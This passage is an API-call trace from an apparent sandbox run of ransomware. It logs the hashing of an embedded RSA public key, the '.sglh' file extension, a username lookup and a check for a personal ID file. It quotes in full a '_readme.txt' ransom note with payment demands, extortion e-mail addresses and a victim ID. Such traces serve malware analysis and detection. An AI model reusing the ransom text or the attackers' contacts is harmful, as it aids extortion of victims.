KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 491 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x5f0) returned 0x62c3208 [0126.276] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c2c10 | out: hHeap=0x31d0000) returned 1 [0126.276] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d4090 | out: hHeap=0x31d0000) returned 1 [0126.276] CryptAcquireContextW (in: phProv=0x18de3c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18de3c*=0x32314e0) returned 1 [0126.277] CryptCreateHash (in: hProv=0x32314e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18de40 | out: phHash=0x18de40) returned 1 [0126.277] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0126.277] CryptHashData (hHash=0x5e3e508, pbData=0x62c3208, dwDataLen=0x1ea, dwFlags=0x0) returned 1 [0126.277] CryptGetHashParam (in: hHash=0x5e3e508, dwParam=0x2, pbData=0x0, pdwDataLen=0x18de44, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18de44) returned 1 [0126.277] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x11) returned 0x5e07ed0 [0126.277] CryptGetHashParam (in: hHash=0x5e3e508, dwParam=0x2, pbData=0x5e07ed0, pdwDataLen=0x18de44, dwFlags=0x0 | out: pbData=0x5e07ed0, pdwDataLen=0x18de44) returned 1 [0126.277] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x34) returned 0x5e3e588 [0126.277] GetLastError () returned 0x0 [0126.277] lstrcatA (in: lpString1="", lpString2="C3" | out: lpString1="C3") returned="C3" [0126.277] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3", lpString2="84" | out: lpString1="C384") returned="C384" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C384", lpString2="37" | out: lpString1="C38437") returned="C38437" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C38437", lpString2="37" | out: lpString1="C3843737") returned="C3843737" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3843737", lpString2="F5" | out: lpString1="C3843737F5") returned="C3843737F5" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3843737F5", lpString2="4B" | out: lpString1="C3843737F54B") returned="C3843737F54B" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3843737F54B", lpString2="AE" | out: lpString1="C3843737F54BAE") returned="C3843737F54BAE" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3843737F54BAE", lpString2="BF" | out: lpString1="C3843737F54BAEBF") returned="C3843737F54BAEBF" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3843737F54BAEBF", lpString2="38" | out: lpString1="C3843737F54BAEBF38") returned="C3843737F54BAEBF38" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3843737F54BAEBF38", lpString2="13" | out: lpString1="C3843737F54BAEBF3813") returned="C3843737F54BAEBF3813" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3843737F54BAEBF3813", lpString2="7D" | out: lpString1="C3843737F54BAEBF38137D") returned="C3843737F54BAEBF38137D" [0126.278] GetLastError () returned 0x0 [0126.278] lstrcatA (in: lpString1="C3843737F54BAEBF38137D", lpString2="CB" | out: lpString1="C3843737F54BAEBF38137DCB") returned="C3843737F54BAEBF38137DCB" [0126.278] GetLastError () returned 0x0 [0126.279] lstrcatA (in: lpString1="C3843737F54BAEBF38137DCB", lpString2="1B" | out: lpString1="C3843737F54BAEBF38137DCB1B") returned="C3843737F54BAEBF38137DCB1B" [0126.279] GetLastError () returned 0x0 [0126.279] lstrcatA (in: lpString1="C3843737F54BAEBF38137DCB1B", lpString2="6F" | out: lpString1="C3843737F54BAEBF38137DCB1B6F") returned="C3843737F54BAEBF38137DCB1B6F" [0126.279] GetLastError () returned 0x0 [0126.279] lstrcatA (in: lpString1="C3843737F54BAEBF38137DCB1B6F", lpString2="0B" | out: lpString1="C3843737F54BAEBF38137DCB1B6F0B") returned="C3843737F54BAEBF38137DCB1B6F0B" [0126.279] GetLastError () returned 0x0 [0126.279] lstrcatA (in: lpString1="C3843737F54BAEBF38137DCB1B6F0B", lpString2="1C" | out: lpString1="C3843737F54BAEBF38137DCB1B6F0B1C") returned="C3843737F54BAEBF38137DCB1B6F0B1C" [0126.279] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e07ed0 | out: hHeap=0x31d0000) returned 1 [0126.279] CryptDestroyHash (hHash=0x5e3e508) returned 1 [0126.279] CryptReleaseContext (hProv=0x32314e0, dwFlags=0x0) returned 1 [0126.279] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c3208 | out: hHeap=0x31d0000) returned 1 [0126.279] lstrlenA (lpString="C3843737F54BAEBF38137DCB1B6F0B1C") returned 32 [0126.279] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x3e0) returned 0x62d4090 [0126.279] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x5ea) returned 0x62c2c10 [0126.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x62c2c10, cbMultiByte=1514, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 491 [0126.279] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x5f0) returned 0x62c3208 [0126.279] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c2c10 | out: hHeap=0x31d0000) returned 1 [0126.279] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d4090 | out: hHeap=0x31d0000) returned 1 [0126.279] lstrcpyA (in: lpString1=0x6350708, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0126.279] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c3208 | out: hHeap=0x31d0000) returned 1 [0126.279] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x32bfec8 [0126.279] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x28) returned 0x62cf328 [0126.279] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e39a68 [0126.279] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e39cd0 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e39f38 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3a1a0 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3a408 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3a670 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3a8d8 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3ab40 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3ada8 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3b010 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x816) returned 0x62c2c10 [0126.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18de48, cbMultiByte=-1, lpWideCharStr=0x62c2c10, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x62c5338 [0126.280] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c2c10 | out: hHeap=0x31d0000) returned 1 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x28) returned 0x62cf358 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3b278 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3b4e0 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3b748 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3b9b0 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3bc18 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3be80 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3c0e8 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3c350 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3c5b8 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3c820 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xa0) returned 0x32b7248 [0126.280] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x130) returned 0x5dda6f8 [0126.281] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32b7248 | out: hHeap=0x31d0000) returned 1 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x1d0) returned 0x62c4d50 [0126.281] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dda6f8 | out: hHeap=0x31d0000) returned 1 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2b7) returned 0x62d4090 [0126.281] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c4d50 | out: hHeap=0x31d0000) returned 1 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x412) returned 0x62d4350 [0126.281] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d4090 | out: hHeap=0x31d0000) returned 1 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x61a) returned 0x62c2c10 [0126.281] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d4350 | out: hHeap=0x31d0000) returned 1 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x430) returned 0x62c3238 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x105c) returned 0x62c5b60 [0126.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x62c3238, cbMultiByte=-1, lpWideCharStr=0x62c5b60, cchWideChar=2094 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-lYFGr2p9Fq\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0266Orjk") returned 1071 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x1060) returned 0x62c6bc8 [0126.281] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c5b60 | out: hHeap=0x31d0000) returned 1 [0126.281] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c3238 | out: hHeap=0x31d0000) returned 1 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x28) returned 0x62cf388 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3ca88 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e3ccf0 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bb3c0 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bb628 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bb890 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bbaf8 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bbd60 [0126.281] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bbfc8 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bc230 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bc498 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x80a) returned 0x62c5b60 [0126.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18de48, cbMultiByte=-1, lpWideCharStr=0x62c5b60, cchWideChar=1029 | out: lpWideCharStr=".sglh") returned 6 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x62c6378 [0126.282] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c5b60 | out: hHeap=0x31d0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x20) returned 0x5ea3a78 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f560 [0126.282] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e07d50 | out: hHeap=0x31d0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x50) returned 0x62d0368 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x48) returned 0x5e34060 [0126.282] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f560 | out: hHeap=0x31d0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x32c0068 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x32c00d0 [0126.282] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e34060 | out: hHeap=0x31d0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e15958 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x90) returned 0x31fe2c8 [0126.282] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32c00d0 | out: hHeap=0x31d0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x50) returned 0x62d03c0 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x50) returned 0x62d0418 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xd8) returned 0x5db0920 [0126.282] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31fe2c8 | out: hHeap=0x31d0000) returned 1 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e159e8 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x20) returned 0x5ea3cd0 [0126.282] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x50) returned 0x62d0470 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x138) returned 0x5dda6f8 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5db0920 | out: hHeap=0x31d0000) returned 1 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x32c00d0 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e15a30 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x50) returned 0x62d04c8 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x50) returned 0x62d0520 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x1c8) returned 0x62b93c0 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dda6f8 | out: hHeap=0x31d0000) returned 1 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e15a78 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c1828 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3a78 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d0368 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32c0068 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e15958 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d03c0 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d0418 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e159e8 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3cd0 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d0470 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32c00d0 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e15a30 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d04c8 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d0520 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e15a78 | out: hHeap=0x31d0000) returned 1 [0126.283] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b93c0 | out: hHeap=0x31d0000) returned 1 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x28) returned 0x62cf3b8 [0126.283] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bc700 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bc968 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bcbd0 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bce38 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bd0a0 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bd308 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bd570 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bd7d8 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bda40 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62bdca8 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xa0) returned 0x32b7248 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x130) returned 0x5dda6f8 [0126.284] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32b7248 | out: hHeap=0x31d0000) returned 1 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x1d0) returned 0x62c4d50 [0126.284] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dda6f8 | out: hHeap=0x31d0000) returned 1 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2b7) returned 0x62c7c30 [0126.284] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c4d50 | out: hHeap=0x31d0000) returned 1 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x412) returned 0x62bf3a8 [0126.284] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c7c30 | out: hHeap=0x31d0000) returned 1 [0126.284] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x61a) returned 0x62c3238 [0126.284] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62bf3a8 | out: hHeap=0x31d0000) returned 1 [0126.284] GetUserNameW (in: lpBuffer=0x18e048, pcbBuffer=0x18debc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18debc) returned 1 [0126.285] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x590) returned 0x62d4090 [0126.285] GetLastError () returned 0x0 [0126.289] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dbb0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.289] GetLastError () returned 0x3 [0126.289] GetLastError () returned 0x3 [0126.289] CreateDirectoryW 